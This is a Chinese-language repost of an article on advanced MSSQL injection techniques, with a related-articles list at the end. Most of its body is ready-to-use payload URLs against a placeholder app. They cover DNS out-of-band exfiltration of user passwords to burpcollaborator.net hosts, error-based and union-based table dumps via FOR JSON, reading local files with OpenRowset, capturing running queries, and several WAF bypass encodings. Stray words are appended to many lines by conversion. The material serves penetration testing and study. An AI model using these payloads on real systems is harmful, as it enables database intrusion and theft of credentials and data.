高級的MSSQL注入技巧
tl;dr
本文列舉了幾種改進的MSSQL注入技巧,全部的攻擊向量都至少在三個最新版本的Microsoft SQL Server上進行了測試:201九、201七、2016SP2。sql
DNS Out-of-Band
若是遇到帶有禁用堆棧查詢的徹底盲SQL注入,則能夠經過函數 fn_xe_file_target_read_file, fn_get_audit_file,和fn_trace_gettable實現DNS帶外(OOB)數據泄露。
利用fn_xe_file_target_read_file()的例子:數據庫
https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:*.xel',''%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net1.xem',null,null))
權限:須要控制服務器權限。
fn_trace_gettable()例子:json
https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable(''%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net1.trc',default))
權限:須要控制服務器權限。服務器
Alternative Error-Based vectors
基於錯誤的SQL注入一般相似於«+AND+1=@@version–»等結構,以及基於«OR»操做符的變體。包含此類表達式的查詢一般會被WAF阻止。爲了繞過,能夠使用%2b字符將字符串與特定函數調用的結果鏈接起來,該函數調用會在須要的數據上觸發數據類型轉換錯誤。
特定函數的例子:架構
SUSER_NAME() USER_NAME() PERMISSIONS() DB_NAME() FILE_NAME() TYPE_NAME() COL_NAME()
USER_NAME():的例子app
https://vuln.app/getItem?id=1'%2buser_name(@@version)--
快速利用:在一個查詢中檢索整個表
有兩種簡單的方法能夠在一個查詢中檢索表的所有內容-使用FOR XML或FOR JSON子句。FOR XML子句須要指定的模式,如«raw»,所以JSON比較簡潔。
從當前數據庫檢索架構、表和列的查詢:函數
https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--
基於錯誤的攻擊向量須要別名或名稱,由於沒有別名或名稱的表達式的輸出不能格式化爲JSON。測試
https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--
Reading local files
使用OpenRowset()函數檢索本地文件C:Windowswin.ini的例子:spa
https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+’C:Windowswin.ini’,SINGLE_CLOB)+R(x)),null,null
基於錯誤的payload.net
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:Windowswin.ini',SINGLE_CLOB)+R(x))--
權限:BULK選項須要「ADMINISTER BULK OPERATIONS 」或「ADMINISTER DATABASE BULK OPERATIONS」權限。
檢索當前查詢
能夠從Access sys.dm_exec_Requests和sys.dm_exec_sql_text中檢索當前正在執行的SQL查詢:
https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null
權限:若是user在服務器上擁有VIEW SERVER STATE權限,則用戶將看到SQL Server實例上正在執行的全部會話;不然,user將僅看到當前會話。
繞過WAF的小技巧
一些特殊字符 %C2%85 или %C2%A0:
https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null--
科學(0E)和十六進制(0x)表示法:
https://vuln.app/getItem?id=0eunion+select+null,@@version,null-- https://vuln.app/getItem?id=0xunion+select+null,@@version,null--
在From和列名之間使用句號代替空格:
https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--
N分隔符:
https://vuln.app/getItem?id=0xunion+selectNnull,@@version,null+from+users-- 原文:https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/
- 1. mssql注入
- 2. mssql 注入
- 3. TypeScript 高級技巧
- 4. JavaScript高級技巧
- 5. JS高級技巧
- 6. typescript 高級技巧
- 7. 高級技巧(JavaScript)
- 8. CSS高級技巧
- 9. SEO高級技巧
- 10. Admob高級技巧
- 更多相關文章...
- • Markdown 高級技巧 - Markdown 教程
- • SQLite 注入 - SQLite教程
- • YAML 入門教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. mssql注入
- 2. mssql 注入
- 3. TypeScript 高級技巧
- 4. JavaScript高級技巧
- 5. JS高級技巧
- 6. typescript 高級技巧
- 7. 高級技巧(JavaScript)
- 8. CSS高級技巧
- 9. SEO高級技巧
- 10. Admob高級技巧